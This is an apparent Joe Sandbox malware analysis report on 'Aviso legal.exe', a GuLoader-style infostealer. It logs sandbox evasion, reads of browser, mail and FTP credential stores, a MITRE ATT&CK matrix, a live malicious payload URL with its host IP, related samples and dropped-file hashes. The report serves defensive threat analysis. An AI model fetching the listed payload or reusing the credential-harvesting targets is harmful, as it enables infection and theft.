        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\Desktop\Aviso legal.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
        Source: C:\Users\user\Desktop\Aviso legal.exeMemory allocated: 120000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeMemory allocated: 36270000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeMemory allocated: 36070000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\Aviso legal.exeAPI coverage: 2.7 %
        Source: C:\Users\user\Desktop\Aviso legal.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
        Source: C:\Users\user\Desktop\Aviso legal.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C49
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,0_2_00406873
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 10_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,10_2_00405C49
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 10_2_00406873 FindFirstFileW,FindClose,10_2_00406873
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 10_2_0040290B FindFirstFileW,10_2_0040290B
        Source: Aviso legal.exe, 0000000A.00000002.6058215595.0000000005A13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: Aviso legal.exe, 0000000A.00000002.6058215595.0000000005A13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,Q
        Source: C:\Users\user\Desktop\Aviso legal.exeAPI call chain: ExitProcess graph end nodegraph_0-4308
        Source: C:\Users\user\Desktop\Aviso legal.exeAPI call chain: ExitProcess graph end nodegraph_0-4463
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 10_2_00401941 LdrInitializeThunk,10_2_00401941
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 0_2_705B1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_705B1BFF
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeProcess created: C:\Users\user\Desktop\Aviso legal.exe "C:\Users\user\Desktop\Aviso legal.exe"Jump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeQueries volume information: C:\Users\user\Desktop\Aviso legal.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D
        Source: C:\Users\user\Desktop\Aviso legal.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Source: C:\Users\user\Desktop\Aviso legal.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
        Source: C:\Users\user\Desktop\Aviso legal.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
        Source: Yara matchFile source: 0000000A.00000002.6069498581.00000000362C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: Aviso legal.exe PID: 6196, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
        Windows Management Instrumentation
        1
        DLL Side-Loading
        1
        Access Token Manipulation
        1
        Masquerading
        2
        OS Credential Dumping
        111
        Security Software Discovery
        Remote Services1
        Email Collection
        11
        Encrypted Channel
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts1
        Native API
        Boot or Logon Initialization Scripts11
        Process Injection
        12
        Virtualization/Sandbox Evasion
        1
        Credentials in Registry
        12
        Virtualization/Sandbox Evasion
        Remote Desktop Protocol1
        Archive Collected Data
        1
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        DLL Side-Loading
        1
        Disable or Modify Tools
        Security Account Manager1
        System Network Configuration Discovery
        SMB/Windows Admin Shares2
        Data from Local System
        2
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Access Token Manipulation
        NTDS2
        File and Directory Discovery
        Distributed Component Object Model1
        Clipboard Data
        13
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
        Process Injection
        LSA Secrets26
        System Information Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Deobfuscate/Decode Files or Information
        Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
        Obfuscated Files or Information
        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        Aviso legal.exe100%AviraHEUR/AGEN.1331786
        Aviso legal.exe18%ReversingLabsWin32.Trojan.Generic
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll0%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://api.ipify.org/0%Avira URL Cloudsafe
        http://lovekelley.ru.com/FroOsE89.bin100%Avira URL Cloudmalware
        http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        api.ipify.org
        104.26.12.205
        truefalse
          unknown
          lovekelley.ru.com
          172.93.121.7
          truefalse
            unknown
            NameMaliciousAntivirus DetectionReputation
            https://api.ipify.org/false
            • Avira URL Cloud: safe
            unknown
            http://lovekelley.ru.com/FroOsE89.binfalse
            • Avira URL Cloud: malware
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://nsis.sf.net/NSIS_ErrorErrorAviso legal.exe, 00000000.00000000.954159692.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Aviso legal.exe, 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Aviso legal.exe, 0000000A.00000000.1264288005.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            104.26.12.205
            api.ipify.orgUnited States
            13335CLOUDFLARENETUSfalse
            172.93.121.7
            lovekelley.ru.comUnited States
            393960HOST4GEEKS-LLCUSfalse
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1445943
            Start date and time:2024-05-22 20:28:54 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 15m 51s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
            Run name:Suspected Instruction Hammering
            Number of analysed new started processes analysed:25
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:Aviso legal.exe
            Detection:MAL
            Classification:mal92.troj.spyw.evad.winEXE@3/22@2/2
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 96%
            • Number of executed functions: 113
            • Number of non-executed functions: 63
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe, UsoClient.exe
            • Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, tse1.mm.bing.net, settings-win.data.microsoft.com, g.bing.com, arc.msn.com
            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtReadVirtualMemory calls found.
            • Report size getting too big, too many NtSetInformationFile calls found.
            • VT rate limit hit for: Aviso legal.exe
            No simulations
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            104.26.12.205482730621.exeGet hashmaliciousStealitBrowse
            • api.ipify.org/?format=json
            482730621.exeGet hashmaliciousStealitBrowse
            • api.ipify.org/?format=json
            Sonic-Glyder.exeGet hashmaliciousStealitBrowse
            • api.ipify.org/?format=json
            Sky-Beta.exeGet hashmaliciousStealitBrowse
            • api.ipify.org/?format=json
            SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exeGet hashmaliciousBunny LoaderBrowse
            • api.ipify.org/
            lods.cmdGet hashmaliciousRemcosBrowse
            • api.ipify.org/
            172.93.121.7MSK203.exeGet hashmaliciousGuLoaderBrowse
            • larpawards.sa.com/IEiHcWVkgF180.bin
            Pro_Samples.exeGet hashmaliciousGuLoaderBrowse
            • magnocomx.ru.com/LOxkgzXaULOn55.bin
            SAMPLES.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
            • magnocomx.ru.com/MHCJMpUZ92.bin
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            api.ipify.orgInventory_list.img.exeGet hashmaliciousGuLoaderBrowse
            • 104.26.13.205
            Draft BL copy.exeGet hashmaliciousAgentTeslaBrowse
            • 104.26.12.205
            5302c416b0abd845fe3145f910e82440588c11219940fe89fd68722260a9b508_payload.exeGet hashmaliciousAgentTeslaBrowse
            • 172.67.74.152
            SOA_41457.exeGet hashmaliciousAgentTeslaBrowse
            • 172.67.74.152
            INSTALLATION BOQ KATSINA.exeGet hashmaliciousAgentTeslaBrowse
            • 104.26.13.205
            Doc1000050789.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            • 172.67.74.152
            SecuriteInfo.com.Win64.PWSX-gen.16698.32595.exeGet hashmaliciousAgentTeslaBrowse
            • 172.67.74.152
            rSipari__PO408232023_ZNG__stanbul_pdf.exeGet hashmaliciousAgentTeslaBrowse
            • 104.26.13.205
            MSK203.exeGet hashmaliciousGuLoaderBrowse
            • 104.26.12.205
            PO N#U00b0202415-0004 LUZNAGRA-INDUSTRIA_pdf.exeGet hashmaliciousAgentTeslaBrowse
            • 104.26.12.205
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            CLOUDFLARENETUSPURCHASE ORDER.docGet hashmaliciousFormBookBrowse
            • 188.114.97.3
            https://tome.app/magic-inc-575/battalion-oil-corp-clwf4e8zj1eawod650qdnv0xx?page=kr1gn8q23ho9ojwq7i3rue30&d=DwMFAgGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
            • 104.17.2.184
            https://bunmioyinsan.com/404.php?7-797967704b53693230746650794d394c5361334d7a632f50307973713163744c4c644776536a59334337616f384e4850424d705536475755354f594141413d3d=797967704b536932307465767143677379306c4b4c5333504e74444c4b63334e4c4d354c4c4b7255793873763079737131516341&em=bWplc3NlQGJyb3duaW5nY2hhcG1hbi5jb20=Get hashmaliciousUnknownBrowse
            • 104.17.25.14
            Colep Packaging Polska (602447) - invoice 342000749.exeGet hashmaliciousGuLoaderBrowse
            • 188.114.96.3
            Noyan Order Feb 2024 - Globalimportgroup.exeGet hashmaliciousGuLoaderBrowse
            • 188.114.97.3
            Inventory_list.img.exeGet hashmaliciousGuLoaderBrowse
            • 104.26.13.205
            ordendecarga241626casadoorsm.exeGet hashmaliciousGuLoaderBrowse
            • 188.114.96.3
            https://umn.adnxs.com/clktrb?id=092070&redir=//cloudflare-ipfs.com/ipfs/bafybeia2uvj3sitwpuaf4jgessydk6eoaspcym62bihuwbygggcbgd4nna/?*/oMTqwOWufzKCNnxPSr8v6y2ySjfHWwR+7bB3gi8sS7dz5VngVaYN21vSPDPIt+zL2eLaYM3MXtiohyqv#cGhpc2hpbmdAdW1uLmVkdQ==Get hashmaliciousHTMLPhisherBrowse
            • 104.17.25.14
            https://tome.app/magic-inc-575/battalion-oil-corp-clwf4e8zj1eawod650qdnv0xx?page=kr1gn8q23ho9ojwq7i3rue30Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
            • 104.17.2.184
            file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
            • 172.67.75.166
            HOST4GEEKS-LLCUSCONTRACTUL MODIFICAT-pdf.bat.exeGet hashmaliciousAgentTeslaBrowse
            • 172.93.120.190
            MSK203.exeGet hashmaliciousGuLoaderBrowse
            • 172.93.121.7
            Pro_Samples.exeGet hashmaliciousGuLoaderBrowse
            • 172.93.121.7
            SAMPLES.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
            • 172.93.121.7
            Liste d'inventaire.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 185.221.216.115
            Production_list.exeGet hashmaliciousGuLoaderBrowse
            • 185.221.216.115
            Inventory_list.exeGet hashmaliciousGuLoaderBrowse
            • 185.221.216.115
            Doc_for Gregpurdy.docxGet hashmaliciousHTMLPhisherBrowse
            • 172.93.120.161
            Dataupdate.exeGet hashmaliciousGuLoaderBrowse
            • 185.221.216.115
            UPS DOCS.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
            • 185.221.216.115
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            3b5074b1b5d032e5620f69f9f700ff0eInventory_list.img.exeGet hashmaliciousGuLoaderBrowse
            • 104.26.12.205
            temp.vbsGet hashmaliciousGuLoader, XWormBrowse
            • 104.26.12.205
            Airbornemx SWIFT COPY _ Wednesday May 2024..rtfGet hashmaliciousHTMLPhisherBrowse
            • 104.26.12.205
            Draft BL copy.exeGet hashmaliciousAgentTeslaBrowse
            • 104.26.12.205
            5302c416b0abd845fe3145f910e82440588c11219940fe89fd68722260a9b508_payload.exeGet hashmaliciousAgentTeslaBrowse
            • 104.26.12.205
            what dmv forms do i need to sell my car in ny 88970.jsGet hashmaliciousGookitLoaderBrowse
            • 104.26.12.205
            RFQ-101432620247fl#U00e2#U00aexslx.exeGet hashmaliciousAgentTeslaBrowse
            • 104.26.12.205
            SOA_41457.exeGet hashmaliciousAgentTeslaBrowse
            • 104.26.12.205
            QUOTATION SHEET_RFQ 564077 2024.5.17.exeGet hashmaliciousAgentTeslaBrowse
            • 104.26.12.205
            INSTALLATION BOQ KATSINA.exeGet hashmaliciousAgentTeslaBrowse
            • 104.26.12.205
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dllMSK203.exeGet hashmaliciousGuLoaderBrowse
              MSK203.exeGet hashmaliciousGuLoaderBrowse
                SecuriteInfo.com.Trojan.InstallCore.4086.7598.27088.exeGet hashmaliciousPrivateLoader, PureLog StealerBrowse
                  SecuriteInfo.com.Trojan.InstallCore.4086.7598.27088.exeGet hashmaliciousPrivateLoader, PureLog StealerBrowse
                    61pzTJKVJX.exeGet hashmaliciousDCRatBrowse
                      990009371653-Q095605-0-TB727985.exeGet hashmaliciousGuLoaderBrowse
                        Structure description-Rev.00.exeGet hashmaliciousGuLoaderBrowse
                          #Ubcf5#Uc0ac#Ubcf8 NDS24000012-2-Rev.0.exeGet hashmaliciousGuLoaderBrowse
                            RFQ-NVW-Norsok-EQPT REQS-Rev.00.exeGet hashmaliciousGuLoaderBrowse
                              Process:C:\Users\user\Desktop\Aviso legal.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):409078
                              Entropy (8bit):7.025047982289486
                              Encrypted:false
                              SSDEEP:6144:OfFg587/PrfLt9lGgbFJDyW2CIqjgOov+PoQJ3yEDi9UlzbWIBSYtU1vMfud:ONg58DzfLt9nbFJDxXcT+A6DP0aSYtbQ
                              MD5:7590D8090323B4D45AB454BA0F2ACD51
                              SHA1:FA077E6D2FA069CA51852408A0A2D047BC57F5AD
                              SHA-256:8D5E0C4D96592BFB50D72E07228097FC855A248CD2E3DF72984AB17CE9489180
                              SHA-512:32CA31F735849E8309E52C548704A6BE578F2BFA4BF7FCBD2BBF9AB14F71C05BDEBFB52EEBC077C2FD167D0EF91E14E61ED29252CE76F48074BAB92A22624CFD
                              Malicious:false
                              Reputation:low
                              Preview:........t.@@@...@......N.......]]..............JJ.???.BB...///..........d..........d...uu.t......X........[...XX.....'.FF.......ffff.............................................................o.88888....EEE..{{{{{................................W.....FF...}}}...............ee............................}..........x... ........................cc.)).---.."""..C...^.....................1..............[..............3....................0.."""....vvv.;...................................................C..k............222......>......+..D...u............-..!.....00........)).*..............III.}}}................#.......................))...4.....###...z.L..-........NN........}}}.....................IIII.a......."""".#.|........11.mm...&&.................]]...A..F.......'......xx.......k.............K............>.......................................................****........N..........;..........................<<<.e.EE.........J.""............ii..................rr.v.................
                              Process:C:\Users\user\Desktop\Aviso legal.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2722
                              Entropy (8bit):4.839690262251353
                              Encrypted:false
                              SSDEEP:48:9WnDbvUVgjwxk7wk8PQfmln5hXmXohRU5lhK/PgknruS/D072pPGE3/Nf:0H4AMc/RfyZmXohRUhKngYDD0yp+At
                              MD5:92B65A4EA85F4C1AF62CB993C61D4568
                              SHA1:E79E5232494CA1FED6CD9BC4915C0125623B96CD
                              SHA-256:C14C2EC59396E3A6C1E8CA9ED1216674B7F291E322ADBB235EB10C3EAED9650C
                              SHA-512:4821CE96C99D6782BB7DB99E55E699B986D6F6C8B1B57AF6C9E7C4152C46FA50FB221DD54AECCF142A5E8D08808A9821EC0F5BA094EFEAF4EC453B1CA78530BC
                              Malicious:false
                              Reputation:low
                              Preview:j.... ....(......I.......#..E..j....}.....!........W2..2...;.....(]...ZD..f..'-S...._/..E&..].........W....|..........)...............o...Y.........#...\..../..a......H...........R.&.....5......#....L....c............25.....A..N..../..i[..e...i.................I>.......x..v...i...45.....+.. ........F.............$..M...........W.Im.J...x......a.....N...H........:E.b..........{.......G.@...3........A]\.......i.(:..G\..u..........a.....v.......G.....C,.c.....+?.s...T................x..................o....[........I...................O........ .......l...^.b.........]..............G.........1.R.............D...........E.b...]....4w..L...............o........g...........p.4..J..v.[.I^....=/..........G.E....E.0.VL {...a.......].....G/....L.............@.....;..................B.n~....?...N......d).R'......&.....+.~.'.sl...I..m.....3...&.....]..B..x.i.k.Q.T.......H|....r*....U.S.....V.p.q...e..J..~......).......#.|.'........oO...............9.uj.m............#.._.{t..!...
                              Process:C:\Users\user\Desktop\Aviso legal.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4874
                              Entropy (8bit):4.920645246986102
                              Encrypted:false
                              SSDEEP:96:0SaNvSiGMnOW/lBLz7rTbdD+3i6sG+dlWYzrRz/xOXJD8fNOvqg0JZ:0prDjLzvTbdN6wdpzrH4SLJZ
                              MD5:6A8C19E05EA72B2EE372C52E9DE150A4
                              SHA1:C452083D0DC5A85CD773650D5D3F0F87DC1A32A6
                              SHA-256:A58474474F73CB6EAC7C81D72004AB151C47B179C41D29D73E9CDB2C532453E7
                              SHA-512:64C825FF86B1CE4500D34D980A17214418FAEDE7C5F61AAEC7118B75BDA847BA6465AA675EF07612B46AED914CA6D84C2D0F1BEC25BFCCB7A482194C13B3B00C
                              Malicious:false
                              Reputation:low
                              Preview:i..qE....k;..f......9............AR..`...K......x..Y........?.HI..`D.?.................W..............8....m.D...S...W...}.....P......<...................v.b.......+...........0............9K...\........O..g...k..............sHZ....L............................0O.............a....-.............g.D5........$............4...@.',.p.......r...S{....<.......,a(....CV........,.....p.........5..-.\.........W.....B(.H..V...................N......P.....d6Q...@.R.....w......9..,..L.....B...._...........!...om.$^.u6..........Q... ..U.T..e...............+&.g.g{....qv.....0.....?2.v................."....X.p.R......./..P.....Bn..P...g.o....f............W......E.X.:._..`......I..........[.....E.......W.V...................4...%..............}...G..C.........*..]=.+..........D.......2...J..........l...D....?..................<........_-......8.P..|............+..e.......,..7G....F..........\.......T. .V...........m.....4...,....1..?.............T..j.....y...B..u......q..h..K.........@........
                              Process:C:\Users\user\Desktop\Aviso legal.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3195
                              Entropy (8bit):4.826172613201672
                              Encrypted:false
                              SSDEEP:48:lX4ebVADs8uHITJH2Zk59dKvOlEyDtVdwk25jdM7lJ73NSjUqEqow:S8VADluHIZmkX9dR25RkJLNSjUqEqow
                              MD5:6086222E2529C10A1AEB663C2288CF7B
                              SHA1:FCEE6B724FB6C4584037EC812CE6CFF5EDD42087
                              SHA-256:1DC923EE41E90DEC393A8B7625B4FD439F1974BF97FBD2508BA05FE194BF1DF2
                              SHA-512:17812F6669FA981913E89CFDC635B696672CE31B3960237E3BD1B3668BECC5496067CBAFD3BE1DA2DABD10A99B20DE9B2E98B30766EB607D96952C699ED22492
                              Malicious:false
                              Reputation:low
                              Preview:.I........~...........~o.D.......e.?........../'...............................ql).....j.................&*........T....P..C... ......t.!..".....<..9..y...3.........!..g..0<*...ns....;6...S....+......V..........3. .|....H.q..j..m.................Wn........8.&...=.....w...........>.W.....I................B2}.T.........i.&..9.D.}........0...........Fa.........M.....9Y..1.....T|......m....?..Z......>...........K...Yt.....}.4........(2...+.J...R...............L?.Nk..n......?.....g;.............................v...J...R..!...........&...o..........:.........|..O............".).........<.....o.....F....oI..X........l.........'k......{......I.......z.................).....y(|......t....n..........u.....................9.O. .............`v9......&....5......X......D....B......d..X....O.\............5.s............I................}......2...`.[pr......E...|..........h.R.............(..w...........6......................V.....M...2.$..f...v....%...3..f..........i........^.....
                              Process:C:\Users\user\Desktop\Aviso legal.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4002
                              Entropy (8bit):4.943041620513792
                              Encrypted:false
                              SSDEEP:96:CsV83xzIfux1gb13Xm4DdkLgA6m7jcxhtekQk:CU8hAMQdhk0A774xhX
                              MD5:018A675A1E69825895455988720F29A6
                              SHA1:851955113A180EFBD020A625A2DBD55AEC4722B0
                              SHA-256:434FC226BC639382893C1742DA91B39578531F13D24804F5CA815907885DA53E
                              SHA-512:D11B8A9E0B2DE3F3E63D5D3FFCF1D0D8E8ACAC3B87F5D12FB669B8918AB79E99501AD82F489F3C2FA21190C5020104E322FCA25C82AFA57C4CC20B7F61BA61FB
                              Malicious:false
                              Reputation:low
                              Preview:.1.......$......h..l.....|C...J.<j..vF...c.........G.Q.........................=..D.......x.....^e..L...........wH$......7...C..../.....C..CT.A....2....3.f.........................q..a...h.......Q."....w...;......L....S..@b..z..I.........q..A.....................n.J.......................&...5.$..].f...y.....K.....B............h.\.............L.|......<x......X..i.......Q.................|.E..v..$R......G.c...6.#..sP.......H...........Y........l.<,. ........p....S..0.$....7.V.......... l...6...........D.....'..........V..............!U.........$.a..>.......u..SG...q..{+......x....q9..y..8..=.......N...........,.Z[.........O.....Psp.......,.....x..............Q.....j.....*m.....................0.....M..."........./g.'.................w......d.......6..f.m..A.<M.,......;........,....N.e\......\........|......5p"...&....g.....$.....p..m.%+...S....o....@....d.......J....LH....t...K.......fT....B......>.F....2t.........Hzr..F.I...\......2(........l..........&..#.l.....4...
                              Process:C:\Users\user\Desktop\Aviso legal.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3887
                              Entropy (8bit):4.916542368312967
                              Encrypted:false
                              SSDEEP:96:ZouYwQAzTQTRKfyovTlmgfRPg101L2uTYxk:ZDlTQT0TPNYk
                              MD5:462C5590A716548FA229D546C6BB94A9
                              SHA1:7BD3C711C70797841BC5410D76935E55B3F0550C
                              SHA-256:85D36884D0EF6A606604A19741EC4BC57005D328C6AA1F6C8E2DABB86D66216E
                              SHA-512:EB07E696421E7E566A58695968FF79E71953AEB95064EAD505B9FD557AACEF4F5E97C17DB46A2933B2E8269B43B6B380A8A7B747C5F6B2351E588BB473EC8081
                              Malicious:false
